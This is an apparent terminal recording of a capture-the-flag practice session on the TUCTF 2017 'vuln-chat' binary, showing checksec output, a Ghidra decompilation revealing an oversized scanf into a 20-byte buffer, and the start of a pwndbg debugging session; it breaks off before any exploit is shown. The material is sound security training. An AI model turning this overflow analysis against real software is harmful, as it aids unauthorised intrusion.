{"version": 2, "width": 135, "height": 42, "timestamp": 1757611918, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.144302, "o", "                                                                                                                                       \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007"]
[0.187966, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[1.200533, "o", "l"]
[1.206863, "o", "\b\u001b[36ml\u001b[39m"]
[1.207235, "o", "\b\u001b[36ml\u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\b"]
[1.335683, "o", "\b\u001b[36ml\u001b[36ms\u001b[39m"]
[1.463054, "o", "\u001b[?1l\u001b>"]
[1.463444, "o", "\u001b[?2004l"]
[1.467254, "o", "\r\r\n"]
[1.471498, "o", "flag.txt  ghidra.txt  vuln.cast  \u001b[0m\u001b[01;32mvuln-chat\u001b[0m\r\n"]
[1.471837, "o", "                                                                                                                                       \r\r"]
[1.471942, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[1.50332, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[1.503485, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[2.548307, "o", "f"]
[2.55429, "o", "\b\u001b[4mf\u001b[24m"]
[2.554641, "o", "\b\u001b[4mf\u001b[24m\u001b[38;2;153;153;153mile vuln-chat\u001b[39m\u001b[13D"]
[2.60051, "o", "\b\u001b[4mf\u001b[39m\u001b[4mi\u001b[24m"]
[3.235576, "o", "\b\b\u001b[4mf\u001b[4mi\u001b[39m\u001b[4ml\u001b[24m"]
[3.437607, "o", "\b\u001b[4ml\u001b[39m\u001b[4me\u001b[24m"]
[3.441453, "o", "\b\b\b\b\u001b[24m\u001b[36mf\u001b[24m\u001b[36mi\u001b[24m\u001b[36ml\u001b[24m\u001b[36me\u001b[39m"]
[3.57431, "o", "\b\u001b[36me\u001b[36m \u001b[39m"]
[3.578373, "o", "\b\b\u001b[36me\u001b[39m\u001b[39m "]
[4.085436, "o", "\u001b[9C"]
[4.090415, "o", "\u001b[9D\u001b[1m\u001b[38;2;153;153;153mv\u001b[1m\u001b[38;2;153;153;153mu\u001b[1m\u001b[38;2;153;153;153ml\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m-\u001b[1m\u001b[38;2;153;153;153mc\u001b[1m\u001b[38;2;153;153;153mh\u001b[1m\u001b[38;2;153;153;153ma\u001b[1m\u001b[38;2;153;153;153mt\u001b[0m\u001b[39m"]
[4.361719, "o", "\u001b[?1l\u001b>"]
[4.361881, "o", "\u001b[?2004l"]
[4.366046, "o", "\r\r\n"]
[4.371148, "o", "vuln-chat: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a3caa1805eeeee1454ee76287be398b12b5fa2b7, not stripped\r\n"]
[4.372165, "o", "                                                                                                                                       \r\r"]
[4.372273, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[4.4068, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[4.40694, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[10.566855, "o", "c"]
[10.573663, "o", "\b\u001b[4mc\u001b[24m"]
[10.573803, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat exp.py\u001b[39m\u001b[9D"]
[10.703288, "o", "\b\u001b[4mc\u001b[39m\u001b[4mh\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[8D"]
[10.710561, "o", "\u001b[38;2;153;153;153mmod +x vu\u001b[39m\u001b[38;2;153;153;153mln-chat\u001b[39m\u001b[16D"]
[10.874174, "o", "\b\b\u001b[4mc\u001b[4mh\u001b[39m\u001b[4me\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[15D"]
[11.090081, "o", "\b\u001b[4me\u001b[4mc\u001b[24m"]
[11.211053, "o", "\b\u001b[4mc\u001b[4mk\u001b[24m"]
[12.78956, "o", "\b\b\u001b[4mc\u001b[24m\u001b[24m \b"]
[13.289729, "o", "\b\b\u001b[4me\u001b[24m\u001b[24m \b"]
[13.320103, "o", "\b\b\b\u001b[4mc\u001b[4mh\u001b[24m\u001b[24m \b"]
[13.3245, "o", "\u001b[38;2;153;153;153mmod +x vu\u001b[39m\u001b[38;2;153;153;153mln-chat\u001b[39m\u001b[16D"]
[13.351135, "o", "\b\b\u001b[4mc\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[17D"]
[13.355729, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat exp.py\u001b[39m\u001b[9D"]
[13.37918, "o", "\b\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[10D"]
[13.623086, "o", "p"]
[13.630462, "o", "\b\u001b[4mp\u001b[24m"]
[13.63084, "o", "\b\u001b[4mp\u001b[24m\u001b[38;2;153;153;153mython exp\u001b[39m\u001b[38;2;153;153;153m.py\u001b[39m\u001b[12D"]
[13.737973, "o", "\b\u001b[4mp\u001b[39m\u001b[4mw\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[11D"]
[13.745878, "o", "\u001b[38;2;153;153;153mn checkse\u001b[39m\u001b[38;2;153;153;153mc g\u001b[39m\u001b[38;2;153;153;153met_i\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[17D"]
[13.907556, "o", "\b\b\u001b[4mp\u001b[4mw\u001b[39m\u001b[4mn\u001b[24m\u001b[7C\u001b[38;2;153;153;153me\u001b[38;2;153;153;153mc\u001b[39m\u001b[38;2;153;153;153m \u001b[38;2;153;153;153mg\u001b[38;2;153;153;153me\u001b[39m\u001b[2C\u001b[38;2;153;153;153mi\u001b[15D"]
[13.911172, "o", "\b\b\b\u001b[24m\u001b[36mp\u001b[24m\u001b[36mw\u001b[24m\u001b[36mn\u001b[39m"]
[14.16433, "o", "\b\u001b[36mn\u001b[36m \u001b[39m\u001b[7C\u001b[38;2;153;153;153mc\u001b[2C\u001b[38;2;153;153;153me\u001b[11D"]
[14.167659, "o", "\b\b\u001b[36mn\u001b[39m\u001b[39m "]
[15.072642, "o", "\u001b[15C"]
[15.601981, "o", "\b\b\u001b[38;2;153;153;153mi\u001b[39m\u001b[39m \b"]
[15.60885, "o", "\u001b[38;2;153;153;153mt\u001b[39m\b"]
[15.749227, "o", "\b\b\u001b[38;2;153;153;153m_\u001b[39m\u001b[39m \u001b[39m \b\b"]
[15.756534, "o", "\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\b\b"]
[15.909686, "o", "\b\b\u001b[38;2;153;153;153mt\u001b[39m\u001b[39m \u001b[39m \u001b[39m \b\b\b"]
[15.917797, "o", "\u001b[38;2;153;153;153m_\u001b[39m\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\b\b\b"]
[16.231612, "o", "\b\b\u001b[38;2;153;153;153me\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b"]
[16.238992, "o", "\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153m_\u001b[39m\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\b\b\b\b"]
[16.388179, "o", "\b\b\u001b[38;2;153;153;153mg\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[16.395454, "o", "\b\u001b[1m\u001b[38;2;153;153;153mg\u001b[0m\u001b[39m"]
[16.395988, "o", "\u001b[38;2;153;153;153me\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153m_\u001b[39m\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\b\b\b\b\b"]
[16.544763, "o", "\b\b\u001b[38;2;153;153;153m \u001b[39m\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[16.551115, "o", "\u001b[38;2;153;153;153mg\u001b[39m\u001b[38;2;153;153;153me\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153m_\u001b[39m\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\b\b\b\b\b\b"]
[16.937949, "o", "\b\u001b[38;2;153;153;153m \u001b[38;2;153;153;153mv\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[16.944854, "o", "\b\u001b[1m\u001b[38;2;153;153;153mv\u001b[0m\u001b[39m"]
[16.945266, "o", "\u001b[38;2;153;153;153mu\u001b[39m\u001b[38;2;153;153;153ml\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\b\b\b"]
[17.137332, "o", "\b\u001b[1m\u001b[38;2;153;153;153mv\u001b[1m\u001b[38;2;153;153;153mu\u001b[0m\u001b[39m"]
[17.344596, "o", "\b\u001b[1m\u001b[38;2;153;153;153mu\u001b[1m\u001b[38;2;153;153;153ml\u001b[0m\u001b[39m"]
[17.490403, "o", "\b\u001b[1m\u001b[38;2;153;153;153ml\u001b[1m\u001b[38;2;153;153;153mn\u001b[0m\u001b[39m"]
[18.30994, "o", "\b\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m-\u001b[0m\u001b[39m"]
[18.527462, "o", "\u001b[14D\u001b[38;2;255;153;153mc\u001b[38;2;255;153;153mh\u001b[38;2;255;153;153me\u001b[38;2;255;153;153mc\u001b[38;2;255;153;153mk\u001b[38;2;255;153;153ms\u001b[38;2;255;153;153me\u001b[38;2;255;153;153mc\u001b[38;2;255;153;153m \u001b[1m\u001b[38;2;255;153;153mv\u001b[1m\u001b[38;2;255;153;153mu\u001b[1m\u001b[38;2;255;153;153ml\u001b[1m\u001b[38;2;255;153;153mn\u001b[1m\u001b[38;2;255;153;153m-\u001b[1m\u001b[38;2;255;153;153mchat\u001b[0m\u001b[1m\u001b[38;2;255;153;153m \u001b[0m\u001b[39m"]
[18.927852, "o", "\b\b\u001b[1m\u001b[38;2;255;153;153mt\u001b[0m\u001b[39m\u001b[0m\u001b[39m \b"]
[18.934768, "o", "\u001b[?1l\u001b>"]
[18.934895, "o", "\u001b[?2004l"]
[18.94072, "o", "\r\r\n"]
[19.542896, "o", "[\u001b[1m\u001b[34m*\u001b[m] '/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat/vuln-chat'\r\n    Arch:       i386-32-little\r\n    RELRO:      \u001b[31mNo RELRO\u001b[m\r\n    Stack:      \u001b[31mNo canary found\u001b[m\r\n    NX:         \u001b[32mNX enabled\u001b[m\r\n    PIE:        \u001b[31mNo PIE (0x8048000)\u001b[m\r\n    Stripped:   \u001b[31mNo\u001b[m\r\n"]
[19.705527, "o", "                                                                                                                                       \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[19.738682, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[19.73883, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[22.953561, "o", "c"]
[22.960212, "o", "\b\u001b[4mc\u001b[24m"]
[22.960858, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat exp.py\u001b[39m\u001b[9D"]
[23.156978, "o", "\b\u001b[4mc\u001b[39m\u001b[4ma\u001b[24m"]
[23.246489, "o", "\b\b\u001b[4mc\u001b[4ma\u001b[39m\u001b[4mt\u001b[24m"]
[23.250176, "o", "\b\b\b\u001b[24m\u001b[36mc\u001b[24m\u001b[36ma\u001b[24m\u001b[36mt\u001b[39m"]
[23.478457, "o", "\b\u001b[36mt\u001b[36m \u001b[39m"]
[23.481877, "o", "\b\b\u001b[36mt\u001b[39m\u001b[39m "]
[23.914941, "o", "\u001b[39mg\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[23.921442, "o", "\b\u001b[1mg\u001b[0m"]
[23.921959, "o", "\u001b[38;2;153;153;153mhidra.\u001b[39m\u001b[38;2;153;153;153mtxt\u001b[39m\u001b[9D"]
[24.08452, "o", "\b\u001b[1mg\u001b[39m\u001b[1mh\u001b[0m\u001b[4C\u001b[38;2;153;153;153m.\u001b[38;2;153;153;153mt\u001b[39m\b\b\b\b\b\b"]
[24.37091, "o", "\b\u001b[1mh\u001b[39m\u001b[1mi\u001b[0m\u001b[4C\u001b[38;2;153;153;153mt\u001b[38;2;153;153;153mx\u001b[39m\b\b\b\b\b\b"]
[24.597571, "o", "\b\u001b[1mi\u001b[39m\u001b[1md\u001b[39m\u001b[1mr\u001b[39m\u001b[1ma\u001b[39m\u001b[1m.\u001b[39m\u001b[1mt\u001b[39m\u001b[1mx\u001b[39m\u001b[1mt\u001b[0m\u001b[1m \u001b[0m"]
[25.534929, "o", "\b\u001b[0m \b"]
[25.541053, "o", "\u001b[?1l\u001b>"]
[25.541391, "o", "\u001b[?2004l"]
[25.545711, "o", "\r\r\n"]
[25.548943, "o", "main: \r\n\r\nundefined4 main(void)\r\n\r\n{\r\n  undefined1 local_31 [20];\r\n  undefined1 local_1d [20];\r\n  undefined4 local_9;\r\n  undefined1 local_5;\r\n  \r\n  setvbuf(stdout,(char *)0x0,2,0x14);\r\n  puts(\"----------- Welcome to vuln-chat -------------\");\r\n  printf(\"Enter your username: \");\r\n  local_9 = 0x73303325;\r\n  local_5 = 0;\r\n  __isoc99_scanf(&local_9,local_1d);\r\n  printf(\"Welcome %s!\\n\",local_1d);\r\n  puts(\"Connecting to \\'djinn\\'\");\r\n  sleep(1);\r\n  puts(\"--- \\'djinn\\' has joined your chat ---\");\r\n  puts(\"djinn: I have the information. But how do I know I can trust you?\");\r\n  printf(\"%s: \",local_1d);\r\n  __isoc99_scanf(&local_9,local_31);\r\n  puts(\"djinn: Sorry. That\\'s not good enough\");\r\n  fflush(stdout);\r\n  return 0;\r\n}\r\n\r\nprintFlag:\r\n\r\nvoid printFlag(void)\r\n\r\n{\r\n  system(\"/bin/cat ./flag.txt\");\r\n  puts(\"Use it wisely\");\r\n  return;\r\n}\r\n\r\n"]
[25.549398, "o", "                                                                                                                                       \r\r"]
[25.549628, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[25.583326, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[25.583462, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[31.339135, "o", "g"]
[31.346793, "o", "\b\u001b[4mg\u001b[24m"]
[31.347264, "o", "\b\u001b[4mg\u001b[24m\u001b[38;2;153;153;153mdb ./vuln-chat\u001b[39m\u001b[14D"]
[31.467617, "o", "\b\u001b[4mg\u001b[39m\u001b[4md\u001b[24m"]
[31.5789, "o", "\b\b\u001b[4mg\u001b[4md\u001b[39m\u001b[4mb\u001b[24m"]
[31.582488, "o", "\b\b\b\u001b[24m\u001b[36mg\u001b[24m\u001b[36md\u001b[24m\u001b[36mb\u001b[39m"]
[31.790586, "o", "\b\u001b[36mb\u001b[36m \u001b[39m"]
[31.794411, "o", "\b\b\u001b[36mb\u001b[39m\u001b[39m "]
[32.350447, "o", "\u001b[11C"]
[32.35544, "o", "\u001b[11D\u001b[1m\u001b[38;2;153;153;153m.\u001b[1m\u001b[38;2;153;153;153m/\u001b[1m\u001b[38;2;153;153;153mv\u001b[1m\u001b[38;2;153;153;153mu\u001b[1m\u001b[38;2;153;153;153ml\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m-\u001b[1m\u001b[38;2;153;153;153mc\u001b[1m\u001b[38;2;153;153;153mh\u001b[1m\u001b[38;2;153;153;153ma\u001b[1m\u001b[38;2;153;153;153mt\u001b[0m\u001b[39m"]
[32.649599, "o", "\u001b[?1l\u001b>"]
[32.649692, "o", "\u001b[?2004l"]
[32.654009, "o", "\r\r\n"]
[32.852299, "o", "\u001b[35;1mGNU gdb (Debian 16.3-1) 16.3\u001b[m\r\nCopyright (C) 2024 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later <\u001b[32mhttp://gnu.org/licenses/gpl.html\u001b[m>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.\r\nType \"\u001b[1mshow copying\u001b[m\" and \"\u001b[1mshow warranty\u001b[m\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nType \"\u001b[1mshow configuration\u001b[m\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n\u001b[32m<https://www.gnu.org/software/gdb/bugs/>\u001b[m.\r\nFind the GDB manual and other documentation resources online at:\r\n    <\u001b[32mhttp://www.gnu.org/software/gdb/documentation/\u001b[m>.\r\n\r\nFor help, type \"\u001b[1mhelp\u001b[m\".\r\nType \"\u001b[1mapropos word\u001b[m\" to search for commands related to \"word\"...\r\n"]
[34.229164, "o", "\u001b[31m\u001b[1mpwndbg: \u001b[0m\u001b[31m\u001b[0m\u001b[91mloaded 209 pwndbg commands. Type \u001b[35mpwndbg [filter]\u001b[0m\u001b[91m for a list.\u001b[0m\r\n\u001b[31m\u001b[1mpwndbg: \u001b[0m\u001b[31m\u001b[0m\u001b[91mcreated 13 GDB functions (can be used with print/break). Type \u001b[35mhelp function\u001b[0m\u001b[91m to see them.\u001b[0m\r\n"]
[34.230646, "o", "Reading symbols from \u001b[32m./vuln-chat\u001b[m...\r\n"]
[34.231417, "o", "(No debugging symbols found in \u001b[32m./vuln-chat\u001b[m)\r\n"]
[34.236154, "o", "\u001b[31m\u001b[1m------- tip of the day\u001b[0m\u001b[31m\u001b[0m\u001b[91m (disable with \u001b[35mset show-tips off\u001b[0m\u001b[91m)\u001b[0m\u001b[31m\u001b[1m -------\u001b[0m\u001b[31m\u001b[0m\r\nUse the \u001b[33mcontext\u001b[0m (or \u001b[33mctx\u001b[0m) command to display the context once again. You can reconfigure the context layout with \u001b[33mset context-section <sections>\u001b[0m or forward the output to a file/tty via \u001b[33mset context-output <file>\u001b[0m. See also \u001b[33mconfig context\u001b[0m to configure it further!\r\n"]
[34.236578, "o", "\u001b[?2004h\u001b[31m\u001b[1mpwndbg> \u001b[0m\u001b[31m\u001b[0m"]
[35.211699, "o", "b"]
[35.419651, "o", " "]
[35.677604, "o", "m"]
[35.83177, "o", "a"]
[35.879161, "o", "i"]
[35.980178, "o", "n"]
[36.372098, "o", "\r\n\u001b[?2004l\r"]
[36.372701, "o", "Breakpoint 1 at \u001b[34m0x8048590\u001b[m\r\n"]
[36.372942, "o", "\u001b[?2004h\u001b[31m\u001b[1mpwndbg> \u001b[0m\u001b[31m\u001b[0m"]
[38.89124, "o", "r"]
[39.173829, "o", "\r\n\u001b[?2004l\r"]
[39.174149, "o", "Starting program: \u001b[32m/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat/vuln-chat\u001b[m \r\n"]
[39.229622, "o", "[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"\u001b[32m/lib/x86_64-linux-gnu/libthread_db.so.1\u001b[m\".\r\n"]
[39.234956, "o", "\r\nBreakpoint 1, \u001b[34m0x08048590\u001b[m in \u001b[33mmain\u001b[m ()\r\n"]
[39.237886, "o", "\u001b[?2004h"]
[39.28504, "o", "LEGEND: \u001b[33mSTACK\u001b[0m | \u001b[34mHEAP\u001b[0m | \u001b[31mCODE\u001b[0m | \u001b[35mDATA\u001b[0m | \u001b[4m\u001b[31mWX\u001b[0m\u001b[4m\u001b[0m | \u001b[0mRODATA\u001b[0m\r\n\u001b[34m────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────\u001b[0m\r\n \u001b[1mEAX \u001b[0m \u001b[31m0x804858a (main)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBX \u001b[0m \u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n \u001b[1mECX \u001b[0m 0xe81c0b2f\r\n \u001b[1mEDX \u001b[0m \u001b[33m0xffffcda0\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n \u001b[1mEDI \u001b[0m \u001b[0m0xf7ffcb60 (_rtld_global_ro)\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n"]
[39.285179, "o", " \u001b[1mESI \u001b[0m \u001b[31m0x8048660 (__libc_csu_init)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBP \u001b[0m \u001b[33m0xffffcd78\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESP \u001b[0m \u001b[33m0xffffcd48\u001b[0m\u001b[0m ◂— \u001b[0m0xffffffff\r\n \u001b[1mEIP \u001b[0m \u001b[31m0x8048590 (main+6)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mdword\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mptr\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;141m0x8049a60\u001b[39m\u001b[38;5;15m]\u001b[39m\r\n\u001b[34m──────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]───────────────────────────────────────────────────\u001b[0m\r\n"]
[39.285551, "o", " ► \u001b[1m\u001b[32m0x8048590\u001b[0m\u001b[1m\u001b[0m \u001b[1m\u001b[32m<main+6>  \u001b[0m\u001b[1m\u001b[0m   \u001b[1m\u001b[32m\u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mdword\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mptr\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;141m\u001b[35mstdout@@GLIBC_2.0\u001b[0m\u001b[1m\u001b[32m\u001b[39m\u001b[38;5;15m]\u001b[39m\u001b[0m\u001b[1m\u001b[0m     \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m, [\u001b[35mstdout@@GLIBC_2.0\u001b[0m] => \u001b[35m0xf7f9bd40 (_IO_2_1_stdout_)\u001b[0m\u001b[0m ◂— \u001b[0m0xfbad2084\r\n   \u001b[0m0x8048595\u001b[0m \u001b[0m<main+11> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x14\u001b[39m\r\n   \u001b[0m0x8048597\u001b[0m \u001b[0m<main+13> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m2\u001b[39m\r\n   \u001b[0m0x8048599\u001b[0m \u001b[0m<main+15> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0\u001b[39m\r\n   \u001b[0m0x804859b\u001b[0m \u001b[0m<main+17> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;81meax\u001b[39m\r\n   \u001b[0m0x804859c\u001b[0m \u001b[0m<main+18> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31msetvbuf@plt\u001b[0m\u001b[39m                 <\u001b[31msetvbuf@plt\u001b[0m>\r\n \r\n   \u001b[0m0x80485a1\u001b[0m \u001b[0m<main+23> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x10\u001b[39m\r\n   \u001b[0m0x80485a4\u001b[0m \u001b[0m<main+26> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x8048714\u001b[39m\r\n   \u001b[0m0x80485a9\u001b[0m \u001b[0m<main+31> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mputs@plt\u001b[0m\u001b[39m                    <\u001b[31mputs@plt\u001b[0m>\r\n \r\n"]
[39.285673, "o", "   \u001b[0m0x80485ae\u001b[0m \u001b[0m<main+36> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m4\u001b[39m\r\n   \u001b[0m0x80485b1\u001b[0m \u001b[0m<main+39> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x8048743\u001b[39m\r\n\u001b[34m───────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[0m00\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0000\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mesp\u001b[0m \u001b[33m0xffffcd48\u001b[0m\u001b[0m ◂— \u001b[0m0xffffffff\r\n\u001b[0m01\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0004\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-02c \u001b[33m0xffffcd4c\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7d799dc\u001b[0m\u001b[0m ◂— \u001b[0m0x920 /* ' \\t' */\r\n"]
